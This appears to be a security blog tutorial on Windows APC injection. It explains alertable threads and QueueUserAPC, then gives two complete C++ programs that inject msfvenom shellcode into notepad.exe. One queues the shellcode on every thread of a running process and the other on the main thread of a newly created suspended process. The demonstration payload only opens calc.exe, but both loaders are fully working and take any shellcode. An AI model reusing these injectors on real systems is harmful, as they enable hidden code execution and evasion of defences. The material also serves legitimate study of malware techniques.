Each thread in a program has its own Asynchronous Procedure Call (APC) queue. This queue contains a list of functions that are executed when the thread enters an alertable state. “Alertable” essentially means the thread is waiting for something to happen and has indicated that queued APCs may run while it waits.
A thread enters an alertable state when it calls one of the following functions with the alertable option set:
- SleepEx
- SignalObjectAndWait
- MsgWaitForMultipleObjectsEx
- WaitForMultipleObjectsEx
- WaitForSingleObjectEx
Adding functions to the queue can be done using QueueUserAPC. By abusing APC Queues, we can execute arbitrary code in the context of a remote process.
Remote Thread Injection
The code below adds APC functions to threads in a foreign process by:
- Getting the process PID using the function GetProcessIdByName().
- Executing EnumerateRemoteThreads() to determine the remote thread IDs.
- Allocating memory in the remote process using VirtualAllocEx(), and writing shellcode to it with WriteProcessMemory().
- Finally, calling QueueUserAPC() with a pointer to the allocated shellcode buffer and a handle to each thread.
The function signature for QueueUserAPC is:
DWORD QueueUserAPC(
[in] PAPCFUNC pfnAPC, // pointer to our shellcode
[in] HANDLE hThread, // target thread handle
[in] ULONG_PTR dwData // A value passed to the APC function. We can ignore this.
);
#include <windows.h>
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <vector>
/// Finds a running process by executable name.
///
/// Walks a Toolhelp process snapshot and compares each entry's szExeFile
/// against processName using a case-insensitive comparison.
///
/// @param processName  Executable name to look for (e.g. "notepad.exe").
/// @return The th32ProcessID of the first matching entry, or 0 when the
///         snapshot cannot be created, cannot be read, or has no match.
DWORD GetProcessIdByName(const TCHAR* processName) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0; // Unable to create snapshot
    }

    PROCESSENTRY32 entry;
    // dwSize must be filled in before the first Process32First call.
    entry.dwSize = sizeof(PROCESSENTRY32);

    DWORD foundPid = 0; // stays 0 if the walk fails or nothing matches
    BOOL haveEntry = Process32First(snapshot, &entry);
    while (haveEntry) {
        if (_tcsicmp(entry.szExeFile, processName) == 0) {
            foundPid = entry.th32ProcessID;
            break;
        }
        haveEntry = Process32Next(snapshot, &entry);
    }

    // Single exit point: the snapshot handle is released on every path.
    CloseHandle(snapshot);
    return foundPid;
}
// Collects the IDs of every thread owned by the given process.
//
// Takes a Toolhelp thread snapshot and keeps only the entries whose
// th32OwnerProcessID equals processId.
//
// Returns the matching thread IDs; the vector is empty when the snapshot
// cannot be created, cannot be read, or contains no thread of that process.
// Failures are reported on std::cerr.
std::vector<DWORD> EnumerateRemoteThreads(DWORD processId) {
    std::vector<DWORD> ownedThreads;

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to create snapshot of threads" << std::endl;
        return ownedThreads;
    }

    THREADENTRY32 entry;
    // dwSize must be filled in before the first Thread32First call.
    entry.dwSize = sizeof(THREADENTRY32);

    BOOL haveEntry = Thread32First(snapshot, &entry);
    if (!haveEntry) {
        std::cerr << "Failed to get the first thread" << std::endl;
    }

    while (haveEntry) {
        if (entry.th32OwnerProcessID == processId) {
            ownedThreads.push_back(entry.th32ThreadID);
        }
        haveEntry = Thread32Next(snapshot, &entry);
    }

    CloseHandle(snapshot);
    return ownedThreads;
}
int main(int argc, char* argv[])
{
//msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
const TCHAR* processName = _T("notepad.exe");
DWORD process_id = GetProcessIdByName(processName);
//Get a handle to our remote process
HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(process_id));
// Allocate memory in the remote process
LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// Write our shellcode to the remote process
WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), NULL);
std::vector<DWORD> threads = EnumerateRemoteThreads(process_id);
// loop over the available threads and inject our APC functions
for (DWORD thread_id : threads) {
std::cout << "Injecting into thread ID: " << thread_id << std::endl;
HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS, TRUE, thread_id);
QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0);
}
return 0;
}
The above code will work, but it will result in the shellcode being executed a large number of times, since we have no way of determining when each remote thread will next enter an alertable state. We could inject into a smaller number of threads, but then we have no guarantee the code will trigger in a reasonable timeframe, if at all.
Suspended Thread Execution
To get around the problem of multiple procedures executing at once, we can start a process in a suspended state, queue an APC function on its main thread, and then resume the thread. On resuming the thread, our code should execute once.
#include <windows.h>
#include <iostream>
int main()
{
//msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
LPSTARTUPINFOW startup_info = new STARTUPINFOW();
startup_info->cb = sizeof(STARTUPINFOW);
startup_info->dwFlags = STARTF_USESHOWWINDOW;
PPROCESS_INFORMATION process_info = new PROCESS_INFORMATION();
wchar_t cmd[] = L"notepad.exe\0";
// Create suspended notepad process
CreateProcess( NULL,cmd,NULL, NULL, FALSE,CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, startup_info, process_info);
HANDLE process_handle = process_info->hProcess;
HANDLE thread_handle = process_info->hThread;
// Allocate & write memory
LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), NULL);
//Execute the APC
QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0);
//Continue the thread
ResumeThread(thread_handle);
CloseHandle(thread_handle);
CloseHandle(process_handle);
}
In Conclusion
This post covered the basics of using user-mode APCs to execute shellcode. Interestingly, kernel APCs are often used by EDR solutions to inject hooking code into a monitored application.